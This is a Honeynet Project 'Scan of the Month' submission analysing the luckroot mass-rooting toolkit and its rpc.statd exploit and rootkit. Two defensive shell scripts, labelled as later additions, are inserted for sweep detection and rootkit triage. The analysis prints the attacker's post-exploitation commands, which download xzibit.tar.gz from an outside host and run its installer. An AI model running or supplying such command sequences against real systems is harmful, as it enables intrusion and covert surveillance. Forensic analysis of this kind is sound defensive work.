From jace@deakin.edu.au Sat Mar 17 20:02:13 2001
Date: Fri, 9 Mar 2001 13:44:53 +1100
From: Jason Lee
To: project@honeynet.org
Subject: Scan of the Month - March - Scan13

Hi,

First of all, I'd like to tell you how much I've enjoyed learning from project honeynet. It's excellent. Keep up the good work!

I did some analysis on Scan13 and have attached my findings. This is my first attempt at analyzing a compromise. Probably interesting for you to compare the findings of a novice (me) with seasoned pros.

Jason Lee
7 March 2001

### Question 1. What is the blackhat attempting to do with his command line syntax?

They retrieve LUCKROOT.TAR from www.becys.org via lynx and untar it. Next they run the luckgo shell script against various networks (Question 3 explains how the arguments select a network). I'm not sure why they have tried the "200 120" and "216 1" networks twice. Human error?

### Question 2. What does the tool accomplish?

It obtains (if possible) root access on any host running Red Hat 6.2 inside the network supplied by the user, installs a rootkit, cleans up and exits.

### Question 3. How does the tool work?

The luckgo script takes between 1 and 3 arguments, which correspond to the leading octets of a network address, e.g.:

    ./luckgo 1 2 3   would correspond to the 1.2.3.0 network.
    ./luckgo 1       would correspond to the 1.0.0.0 network.

The luckgo script then checks whether the binaries luckscan-a and luckstatdx exist. If they don't, they are compiled from luckscan-a.c and luckstatdx.c respectively. Next, if the file scan.log exists, it is removed. It then runs luckscan-a with the arguments supplied plus another argument, the port number to check; the port number (111) is supplied as the second argument to luckscan-a.

luckscan-a attempts to connect to port 111 (portmapper) on every host in the network supplied by the user. If a successful connection is made, it runs luckstatdx against that host and continues searching the rest of the hosts in the network.
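The scan stage seen from the defender's side. This is an added example, not part of the submission or of the luckroot tools: the first function maps luckgo's one-to-three leading octets to the network luckscan-a will walk, and the second picks out, from firewall log lines, sources that opened TCP connections to port 111 on many distinct hosts, which is exactly the pattern a luckscan-a sweep leaves. The log layout assumed is the Linux netfilter LOG format (SRC=, DST=, PROTO=, DPT= fields); the lines in SAMPLE_LOG are constructed for the example, not captured traffic.

```shell
#!/bin/sh
# Added example: not part of the original submission or of the luckroot tools.
# Two things the description of luckgo/luckscan-a implies for a defender:
#  1. which network a given luckgo argument list selects, and
#  2. how to spot a luckscan-a style tcp/111 sweep in firewall logs.
# The log layout assumed here is the Linux netfilter LOG format
# (SRC= DST= PROTO= DPT= fields); the lines in SAMPLE_LOG are constructed.

# Map luckgo's 1-3 leading octets to the network it walks.
luckgo_network() {
    case $# in
        1) echo "$1.0.0.0/8" ;;
        2) echo "$1.$2.0.0/16" ;;
        3) echo "$1.$2.$3.0/24" ;;
        *) echo "usage: luckgo_network a [b [c]]" >&2; return 1 ;;
    esac
}

# Report sources that connected to TCP port 111 on at least $2 distinct
# destinations in log file $1. One line per source: "src count".
sweep_sources() {
    awk -v min="$2" '
        {
            src = ""; dst = ""; proto = ""; dpt = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/)        src   = substr($i, 5)
                else if ($i ~ /^DST=/)   dst   = substr($i, 5)
                else if ($i ~ /^PROTO=/) proto = substr($i, 7)
                else if ($i ~ /^DPT=/)   dpt   = substr($i, 5)
            }
            # luckscan-a uses a TCP connect, so ignore UDP hits and other ports;
            # count each (src, dst) pair once so retries do not inflate the tally.
            if (proto == "TCP" && dpt == "111" && src != "" && dst != "" && !seen[src, dst]++)
                hits[src]++
        }
        END { for (s in hits) if (hits[s] >= min) print s, hits[s] }
    ' "$1" | sort
}

# Constructed sample: 10.0.0.5 walks four hosts on tcp/111 (one of them
# twice), 10.0.0.9 touches one, and unrelated ssh/UDP traffic is mixed in.
SAMPLE_LOG='Mar  9 13:44:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.1 PROTO=TCP SPT=1025 DPT=111 SYN
Mar  9 13:44:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.2 PROTO=TCP SPT=1026 DPT=111 SYN
Mar  9 13:44:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.2 PROTO=TCP SPT=1027 DPT=111 SYN
Mar  9 13:44:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.3 PROTO=TCP SPT=1028 DPT=111 SYN
Mar  9 13:44:03 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.4 PROTO=TCP SPT=1029 DPT=111 SYN
Mar  9 13:44:03 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.5 PROTO=TCP SPT=1030 DPT=22 SYN
Mar  9 13:44:04 gw kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=192.168.1.1 PROTO=TCP SPT=2000 DPT=111 SYN
Mar  9 13:44:04 gw kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=192.168.1.6 PROTO=UDP SPT=2001 DPT=111 LEN=64'
SAMPLE_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$SAMPLE_FILE"

# Stand-alone usage: what ./luckgo 216 1 covers, then the sweepers in the sample.
luckgo_network 216 1
sweep_sources "$SAMPLE_FILE" 3
```

The threshold matters: a single connect to tcp/111 is ordinary NFS or NIS traffic, whereas one source touching the portmapper on dozens of consecutive addresses within seconds is a sweep. Counting distinct destinations rather than raw connections keeps retries from a single legitimate client from crossing the line.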
This is the sort of command that is used in the system() call to run luckstatdx:

    luckstatdx -d 0

The '-d 0' option selects the Red Hat 6.2 target type regardless of what the host is actually running. luckstatdx then tries to exploit rpc.statd on the remote host to gain root. If it succeeds at gaining root access, it runs these commands via /bin/sh:

    cd /
    uname -a
    id
    wget -nd http://www.becys.org/xzibit.tar.gz
    tar -zxvf xzibit.tar.gz
    cd lamerk
    ./install
    cd /
    rm -rf lamerk xzibit.tar.gz

xzibit.tar.gz consists of:

    tar -ztvf xzibit.tar.gz
    drwxr-xr-x 1000/1000       0 2001-02-17 23:03:00 lamerk/
    -rwxr-xr-x 1000/1000   19840 1983-09-26 10:45:00 lamerk/ifconfig
    -rwx------ 1000/1000    7165 1983-09-26 10:45:00 lamerk/linsniffer
    -rwx------ 1000/1000      75 1983-09-26 10:45:00 lamerk/logclear
    -rwxr-xr-x 1000/1000   35300 1983-09-26 10:45:00 lamerk/netstat
    -rwxr-xr-x 1000/1000   33280 1983-09-26 10:45:00 lamerk/ps
    -rwxr-xr-x 1000/1000    4060 1983-09-26 10:45:00 lamerk/sense
    -rwx------ 1000/1000    8268 1983-09-26 10:45:00 lamerk/sl2
    -rwxr-xr-x 1000/1000   53588 1983-09-26 10:45:00 lamerk/top
    -rw-r--r-- 1000/1000     704 2001-02-19 13:04:41 lamerk/s
    -rwx------ 1000/1000    1916 2001-02-17 23:02:53 lamerk/install
    -rwxr-xr-x 1000/1000  686535 2000-12-03 07:43:43 lamerk/sshdu
    -rw------- 1000/1000     541 1983-09-26 10:45:00 lamerk/ssh_host_key
    -rw------- 1000/1000     512 1983-09-26 10:45:00 lamerk/ssh_random_seed
    -rwxr-xr-x 1000/1000      76 2000-11-12 09:01:58 lamerk/hdparm
    -rwxr-xr-x 1000/1000    4620 2000-08-09 12:06:10 lamerk/becys.cgi

and the types of the files:

    file *
    becys.cgi:       ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
    hdparm:          Bourne shell script text
    ifconfig:        ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
    install:         Bourne shell script text
    linsniffer:      ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
    logclear:        ASCII text
    netstat:         ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
    ps:              ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
    s:               ASCII text
    sense:           perl commands text
    sl2:             ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
    sshdu:           ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
    ssh_host_key:    data
    ssh_random_seed: data
    top:             ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped

Details of these files:

becys.cgi*
==========
CGI binary that allows commands to be executed as the user that httpd is running as.

hdparm*
=======
Shell script that runs sshdu and linsniffer.

sshdu*, ssh_host_key, ssh_random_seed
=====================================
SSH server.

s
=
The SSH server's system-wide configuration file.

ifconfig*, netstat*, ps*, top*
==============================
Trojaned versions.

install*
========
Shell script that installs the rootkit and creates the config files for the trojaned binaries.

linsniffer*
===========
Network sniffer.

logclear*
=========
Shell script that stops linsniffer, removes tcp.log, touches tcp.log and restarts linsniffer.

sense*
======
Perl script that sorts the output from LinSniffer.

sl2*
====
Not sure, other than a few strings out of the binary:

    Unknown host %s
    sendto
    Usage: %s srcaddr dstaddr low high
    If srcaddr is 0, random addresses will be used
    socket
    %i.%i.%i.%i
    High port must be greater than Low port.

### Question 4. Is this tool a worm, or would you classify it as something else?

I wouldn't call it a worm, because it doesn't self-propagate. I'd call it an automated scripting type of tool. The tool sets out to hack a swag of hosts en masse and report the results back to becys@becys.org.

### Question 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?
Not sure about 'luckgo' and 'luckscan-a', but 'luckstatdx' is the source code of 'statdx' (http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c), used to exploit rpc.statd on Red Hat 6.x, apart from a few modifications.

Firstly, three printf's have been modified. Two are uninteresting, but the other one mentions 'becys|ReSpEkT scan-h4x0r':

    printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n");

The original statdx code only mentions that 'You now have rpc.statd technique', whereas this version also mentions 'scan-h4x0r'. I think this printf reflects that this tool has also installed its rootkit.

The other modification is the commands passed to /bin/sh when the shellcode is executed. The commands are detailed above in the answer to Question 3.

All the C comments detailing the attack in statdx have been removed from the top of the file.

### Bonus Question: What information can you obtain about who is using or created the tool?

becys is using the tool. Maybe too obvious, but becys wrote luckgo, made mods in luckstatdx, and the tool downloads files from http://www.becys.org/. After analyzing the files in xzibit.tar.gz, it's becys or someone from becys.org who's using the tool. After all, in the install script, the results of the hacked host are sent to becys@becys.org. ...Unless someone is framing becys.org.

luckgo
------
Looks like it was written by becys (becys@becys.org, http://www.becys.org), maybe with some help from ReSpEkT.

luckscan-a
----------
I don't think luckscan-a.c was written by becys & ReSpEkT, due to the inconsistency of the style of dialogue in the printf's.

luckstatdx
----------
statdx, from which luckstatdx was modified, was written by ron1n. There is a comment in luckstatdx.c that references becys making a mod:

    // Becys was modify herre some cmd.
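A first-pass host triage built from the xzibit.tar.gz listing in the answer to Question 3. This is an added example, not part of the submission or of the rootkit. The install script is not reproduced in the submission, so where the files end up on a compromised host is an assumption: the checks look for the file names and file types from the tar listing (a surviving /lamerk directory, an hdparm that is a shell script instead of an ELF binary, and the sshdu, linsniffer, logclear, becys.cgi and tcp.log names anywhere on the filesystem) rather than for fixed paths, and they deliberately ignore modification times, since the listing shows most of the binaries carrying a 1983 timestamp. The fake root created by make_sample_tree is constructed so the script runs offline.

```shell
#!/bin/sh
# Added example: not part of the original submission or of the xzibit.tar.gz
# rootkit. A first-pass triage for the artefacts in the tar listing. The
# install script is not reproduced in the submission, so where the files
# land is an assumption: these checks key on names and file types, not on
# fixed paths or mtimes (most of the binaries carry a faked 1983 timestamp).
# $1 is the root to inspect (/ on a live host, or a mounted image). Prints
# one line per hit and returns 0 if nothing was found, 1 otherwise.
check_rootkit_indicators() {
    root=${1:-/}
    hits=0

    # install is run from /lamerk and then "rm -rf lamerk"; a surviving
    # directory means the cleanup step did not complete.
    if [ -d "$root/lamerk" ]; then
        echo "indicator: $root/lamerk still present"
        hits=$((hits + 1))
    fi

    # The kit's hdparm is a Bourne shell script that starts sshdu and
    # linsniffer; the distribution's hdparm is an ELF binary.
    for p in sbin/hdparm usr/sbin/hdparm; do
        if [ -f "$root/$p" ] && head -n 1 "$root/$p" | grep -q '^#!'; then
            echo "indicator: $root/$p is a shell script, expected an ELF binary"
            hits=$((hits + 1))
        fi
    done

    # File names unique to the kit (tcp.log is linsniffer's output, which
    # logclear truncates and recreates).
    found=$(find "$root" -xdev \( -name sshdu -o -name linsniffer -o -name logclear \
                -o -name becys.cgi -o -name tcp.log \) -print 2>/dev/null || true)
    if [ -n "$found" ]; then
        printf '%s\n' "$found" | sed 's/^/indicator: rootkit file name /'
        hits=$((hits + $(printf '%s\n' "$found" | wc -l)))
    fi

    [ "$hits" -eq 0 ]
}

# On a Red Hat host, rpm can also show whether ifconfig/netstat (net-tools)
# and ps/top (procps) still match their packages; a "5" in the output marks
# an MD5 mismatch. Only meaningful on the live system, so not exercised here.
verify_trojan_candidates() {
    command -v rpm >/dev/null 2>&1 || { echo "rpm not available" >&2; return 2; }
    rpm -V net-tools procps
}

# Constructed fake root carrying four indicator hits, for an offline run.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/lamerk" "$t/sbin" "$t/usr/sbin" "$t/var/tmp"
    printf '#!/bin/sh\n/usr/sbin/sshdu\n/usr/sbin/linsniffer\n' > "$t/sbin/hdparm"
    : > "$t/usr/sbin/sshdu"
    : > "$t/var/tmp/tcp.log"
    echo "$t"
}

# Stand-alone usage: run the triage against the fake root.
SAMPLE_ROOT=$(make_sample_tree)
check_rootkit_indicators "$SAMPLE_ROOT" || echo "indicators found under $SAMPLE_ROOT"
```

Because ps, netstat, ifconfig and top are the trojaned binaries, anything they report on the live host is untrusted; run the triage from a known-good shell and toolset (a rescue boot or a mounted image), and treat the rpm verification as confirming, not excluding, a compromise, since the kit could equally have replaced rpm's database.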